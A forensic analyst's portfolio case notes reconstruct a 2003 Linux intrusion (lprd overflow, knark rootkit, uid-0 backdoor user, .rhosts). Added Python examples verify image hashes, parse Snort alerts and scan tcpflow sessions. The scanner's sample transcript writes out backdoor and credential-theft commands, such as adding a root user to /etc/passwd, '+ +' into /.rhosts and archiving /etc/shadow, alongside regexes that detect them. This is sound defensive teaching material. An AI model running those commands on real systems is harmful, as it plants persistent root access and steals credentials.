John B. Baird


Computer Forensic Portfolio

Bradenton, FL

Currently Seeking Employment

Open to relocation


johnbairdpc at gmail dot com


BRJ Software Case Notes


November 28th, 2012


11:44 AM Created BRJ case in EnCase


Note: Saved case and related files to “brj_software” on desktop for easier sharing of files


12:01 PM Opened Hash Tool


12:01 PM Verified MD5 hash value 3f274b39803068d69f8b62730e101d64 matches compressed drive image file


11:08 AM Extracted compressed GZ file of hard drive image


12:10 PM Verified MD5 hash value 4c576fa29dbc1f2e599c17d3ccd7c734 of extracted drive image
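The two hash checks above (compressed image, then the extracted image), as an added Python example that is not part of the original case notes. The file names are assumed; the expected MD5 values are passed in by the caller, and every step appends a line to a log list so the values can be copied straight into the notes. The extracted image is hashed from the decompression stream as it is written, is never allowed to overwrite an existing file, and is made read-only once it verifies.

```python
"""Image verification as in the case notes: hash the compressed image,
extract it, hash the extracted image, keep both values. Added example;
the file names are assumed and the expected hashes come from the caller."""
import gzip
import hashlib
import os


def md5_of_file(path, chunk=1 << 20):
    """Stream the file through MD5 so a multi-GB image need not fit in RAM."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_and_extract(gz_path, want_gz_md5, want_raw_md5, log):
    """Return (ok, extracted_path) and append one log line per step.

    1. hash the compressed file and stop if it does not match;
    2. decompress to <name without .gz>, hashing the stream as it is written;
    3. compare the extracted hash and make the image read-only.
    An already-present extracted file is never overwritten.
    """
    gz_md5 = md5_of_file(gz_path)
    log.append("compressed %s md5=%s expected=%s" % (gz_path, gz_md5, want_gz_md5))
    if gz_md5 != want_gz_md5:
        log.append("MISMATCH on compressed image; not extracting")
        return False, None

    raw_path = gz_path[:-3] if gz_path.endswith(".gz") else gz_path + ".raw"
    if os.path.exists(raw_path):
        log.append("refusing to overwrite existing %s" % raw_path)
        return False, None

    h = hashlib.md5()
    try:
        with gzip.open(gz_path, "rb") as src, open(raw_path, "wb") as dst:
            for block in iter(lambda: src.read(1 << 20), b""):
                h.update(block)
                dst.write(block)
    except (OSError, EOFError):
        os.remove(raw_path)  # do not leave a truncated image behind
        log.append("decompression failed for %s" % gz_path)
        return False, None
    raw_md5 = h.hexdigest()
    os.chmod(raw_path, 0o444)  # evidence copy: read-only from here on
    log.append("extracted %s md5=%s expected=%s" % (raw_path, raw_md5, want_raw_md5))
    if raw_md5 != want_raw_md5:
        log.append("MISMATCH on extracted image; do not add it to the case")
        return False, raw_path
    return True, raw_path


if __name__ == "__main__":
    # Usage with the values recorded in the case notes (image name assumed):
    notes = []
    ok, path = verify_and_extract("brj_image.dd.gz",
                                  "3f274b39803068d69f8b62730e101d64",
                                  "4c576fa29dbc1f2e599c17d3ccd7c734", notes)
    print("\n".join(notes))
```

A mismatch on the compressed file stops the procedure before anything is written; a mismatch on the extracted file leaves the file in place (it may be needed to explain the discrepancy) but reports failure so it is not added to the case.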


12:13 PM Added hard drive image to EnCase


12:14 PM Saved case and closed EnCase


12:15 PM Reopened EnCase and opened BRJ case


12:16 PM Locked computer


1:57 PM Unlocked computer


2:10 PM Added live response data


2:11 PM Saved case and closed EnCase


2:13 PM Booted Linux Backtrack


2:15 PM Determined portscan.log’s line count: 1552


2:22 PM Examined portscan.log’s contents, port scan attempts from to victim machine.


2:29 PM Examined s3.tcpdstat.txt, data from September 8, 2003 from 2:22:05 PM to 4:37:59 PM.

2:47 PM Analyzed s3.lpc with Snort


2:50 PM Exploit detected, “EXPLOIT redhat 7.0 lprd overflow”


Attacker trying to exploit a printer service on port 515 TCP on


15 more exploit messages found


2:56 PM Attack detected “ATTACK-RESPONSES id check returned root”


“This event is generated by the use of a UNIX ‘id’ command. This may be indicative of post-compromise behavior where the attacker is checking for super user privileges gained by a successful exploit against a vulnerable system.”


Attacker trying to exploit printer service on victim machine.


2:59 PM Failed log-in attempts detected, “TELNET login incorrect”, hundreds of alerts. Attacker trying to hack the password to log into the system.


3:03 PM Second attack detected “ATTACK-RESPONSES id check returned root”


3:08 PM Examined s3.tcptrace.txt


Results show brute force attempt against port 515 from attacker.


Attacker appears successful in accessing port 515 from attacker’s port 2089.


Victim machine appears to have accepted attacker’s request for access.


Attacker appears to be accessing FTP services.


Attacker is now listening to SSH services on port 22 TCP.


3:21 PM Backtrack suspended, case suspended.
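The Snort pass above (2:47 PM to 3:03 PM) yields a stream of alerts that has to be turned into a sequence: which signature fired first, how many times, and between which hosts. The following is an added Python example, not part of the original case notes, that parses Snort fast-format alert lines (the output of an assumed `snort -r s3.lpc -A fast` run) into a per-signature summary and then pairs EXPLOIT alerts with the ATTACK-RESPONSES alert that follows them. The alert lines are constructed for illustration; the addresses, ports and SID numbers in them are assumptions, not values from the capture. One detail the pairing relies on: the "id check returned root" rule matches the victim's reply (uid=0(root)), so the alert's source address is the compromised host, not the attacker.

```python
"""Snort fast-alert parsing and exploit/response correlation.
Added example, not from the case notes; sample lines are constructed."""
import re
from collections import OrderedDict

# Snort -A fast format:
# MM/DD-HH:MM:SS.usec [**] [gid:sid:rev] msg [**] [Classification: c] [Priority: p] {PROTO} src:sport -> dst:dport
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<pri>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)

# Constructed sample: addresses, ports and SIDs are assumptions for illustration only.
SAMPLE_ALERTS = """\
09/08-14:22:05.123456 [**] [1:301:10] EXPLOIT redhat 7.0 lprd overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.1.5:2089 -> 192.168.1.10:515
09/08-14:22:06.000001 [**] [1:301:10] EXPLOIT redhat 7.0 lprd overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.1.5:2090 -> 192.168.1.10:515
09/08-14:22:07.500000 [**] [1:498:6] ATTACK-RESPONSES id check returned root [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.10:515 -> 192.168.1.5:2089
09/08-14:30:01.000000 [**] [1:718:7] TELNET login incorrect [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.1.10:23 -> 192.168.1.5:3001
09/08-14:30:03.000000 [**] [1:718:7] TELNET login incorrect [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 192.168.1.10:23 -> 192.168.1.5:3002
this line is not an alert and is skipped
"""


def parse_alerts(lines):
    """Return one dict per well-formed alert line, in file (capture) order."""
    out = []
    for line in lines:
        m = ALERT_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        for k in ("gid", "sid", "rev", "sport", "dport", "pri"):
            d[k] = int(d[k])
        out.append(d)
    return out


def summarize(alerts):
    """Per-signature count, first/last timestamp, and the (src, dst, dport) flows seen."""
    summary = OrderedDict()
    for a in alerts:
        s = summary.setdefault(a["msg"], {"count": 0, "first": a["ts"],
                                          "last": a["ts"], "flows": set()})
        s["count"] += 1
        s["last"] = a["ts"]
        s["flows"].add((a["src"], a["dst"], a["dport"]))
    return summary


def likely_compromised(alerts):
    """Hosts that were the target of an EXPLOIT alert and later appear as the
    *source* of an ATTACK-RESPONSES alert (the root shell answering the attacker)."""
    exploited = {}
    hosts = []
    for a in alerts:
        if a["msg"].startswith("EXPLOIT"):
            exploited.setdefault(a["dst"], a["ts"])
        elif (a["msg"].startswith("ATTACK-RESPONSES")
              and a["src"] in exploited and a["src"] not in hosts):
            hosts.append(a["src"])
    return hosts


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS.splitlines())
    for msg, s in summarize(alerts).items():
        print("%4d  %s .. %s  %s" % (s["count"], s["first"], s["last"], msg))
    print("likely compromised:", likely_compromised(alerts))
```

To run this against the real capture, replace `SAMPLE_ALERTS.splitlines()` with the lines of Snort's alert file; the hundreds of TELNET alerts collapse to one summary row with a first and last time, which is the brute-force window.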


December 1st, 2012


6:51 PM Analyzed s3.lpc using Tcpflow


6:56 PM Successful attack detected against port 2089


7:00 PM Backdoor detected


7:02 PM Attacker analyzing active connections


7:03 PM Attacker analyzing directory listing


7:03 PM Attacker created hidden directory “.kde”


7:04 PM Attacker attempts to download all files beginning with the word “knark”


7:05 PM Attacker tries to add a user called “lpd” with root access


7:06 PM Attacker uses the password “Own3d”


7:10 PM Backtrack suspended, case suspended.


December 2nd, 2012


12:00 PM Attacker verifies password file for user “lpd”


12:02 PM Attacker manually adds user “lpd” to password file


12:03 PM Attacker creates “.rhosts” file in root directory.


12:06 PM Attacker performed directory listing of root


12:07 PM Attacker enters password for “lpd” account


12:08 PM Attacker verifies he is now logged in with “lpd” account


12:09 PM Brute-force tool “Brutus” was running on system, attacker stops the program


12:12 PM Attacker creates “files.tar.gz”


12:14 PM Attacker uploads files “”, “Net-Telnet-3.03.tar.gz”, “allwords.txt”


12:15 PM Attacker downloads files “nat10.tar”, “john-1.6.tar.gz”


12:17 PM Attacker accesses program “datapipe.c” from attacker’s FTP site


*see page 159 for information on this case*


12:27 PM Backtrack closed, case suspended.
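The December 1st and 2nd entries above come from reading the sessions tcpflow wrote out one by one. The following is an added Python example, not part of the original case notes, that scans such a reconstructed session for the behaviours those entries describe (a privilege check, a hidden directory, the knark download, a uid-0 “lpd” user, a .rhosts file, the tool downloads, a staging tarball) and decodes the classic tcpflow file name (zero-padded `src.ip.SPORT-dst.ip.DPORT`) so each hit can be attributed to a flow. The session transcript and addresses are constructed; the commands in it are assumptions for illustration, not text recovered from s3.lpc.

```python
"""Indicator scan over tcpflow session output. Added example, not from the
case notes; the transcript, addresses and flow name below are constructed."""
import re

# Classic tcpflow output file name: zero-padded src.ip.SPORT-dst.ip.DPORT (assumed naming).
FLOW_NAME_RE = re.compile(
    r"^(\d{3})\.(\d{3})\.(\d{3})\.(\d{3})\.(\d{5})-(\d{3})\.(\d{3})\.(\d{3})\.(\d{3})\.(\d{5})$"
)

# Behaviours the case notes attribute to the attacker; one regex applied per session line.
INDICATORS = [
    ("priv-check", re.compile(r"^\s*id\s*$|uid=0\(root\)")),
    ("recon", re.compile(r"^\s*(?:netstat|ps|w|who|last|ls)\b")),
    ("hidden-dir", re.compile(r"\bmkdir\s+(?:-p\s+)?(?:\S*/)?\.\w")),
    ("rootkit-fetch", re.compile(r"\b(?:mget|get|wget|ftp)\b.*\bknark")),
    ("uid0-user", re.compile(r"\buseradd\b.*\s-[ou]\s*0\b|[A-Za-z_][\w-]*:[^:\s]*:0:0:")),
    ("passwd-change", re.compile(r"^\s*passwd\b")),
    ("rhosts", re.compile(r"\.rhosts\b")),
    ("tool-fetch", re.compile(r"\b(?:mget|get|wget)\b.*\b(?:john|nat10|datapipe|Net-Telnet)")),
    ("staging-tarball", re.compile(r"\btar\b.*\.tar(?:\.gz)?\b")),
]

# Constructed attacker-side transcript; every command here is an assumption.
SAMPLE_SESSION = """\
id
uid=0(root) gid=0(root) groups=0(root)
netstat -an
ls -la /
mkdir /dev/.kde
cd /dev/.kde
ftp 192.168.1.5
mget knark*
useradd -u 0 -o -g 0 lpd
passwd lpd
echo 'lpd:x:0:0::/:/bin/sh' >> /etc/passwd
echo '+ +' > /.rhosts
tar czf files.tar.gz /etc/passwd /etc/shadow
get john-1.6.tar.gz
get nat10.tar
get datapipe.c
"""
SAMPLE_FLOW_NAME = "192.168.001.005.02089-192.168.001.010.00515"


def parse_flow_name(name):
    """Return (src, sport, dst, dport) from a tcpflow file name, or None."""
    m = FLOW_NAME_RE.match(name)
    if not m:
        return None
    g = m.groups()
    src = ".".join(str(int(o)) for o in g[0:4])
    dst = ".".join(str(int(o)) for o in g[5:9])
    return src, int(g[4]), dst, int(g[9])


def scan_session(text):
    """Return (line_no, label, line) for every indicator that matches a line.
    A line can carry more than one label; labels follow INDICATORS order."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for label, rx in INDICATORS:
            if rx.search(line):
                hits.append((n, label, line))
    return hits


def count_by_label(hits):
    counts = {}
    for _, label, _ in hits:
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    flow = parse_flow_name(SAMPLE_FLOW_NAME)
    print("flow %s:%d -> %s:%d" % flow)
    for n, label, line in scan_session(SAMPLE_SESSION):
        print("%3d  %-16s %s" % (n, label, line))
```

Running this over each file tcpflow produced, with the file name fed to `parse_flow_name`, gives a per-flow list of indicator lines with line numbers that can be cited directly in the notes; the labels are deliberately coarse so that a new variant (a different hidden directory name, a different rootkit) still lands in the right bucket for a human to read.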


1:10 PM EnCase started, case opened.


1:20 PM Conducted search for keywords:


“files.tar.gz” 3 hits


“” 5 hits


“Net-Telnet-3.03.tar.gz” 1 hit


“allwords.txt” 1 hit


“nat10.tar” 1 hit


“john-1.6.tar.gz” 1 hit


“datapipe.c” 8 hits


1:34 PM Case saved, EnCase closed, computer locked.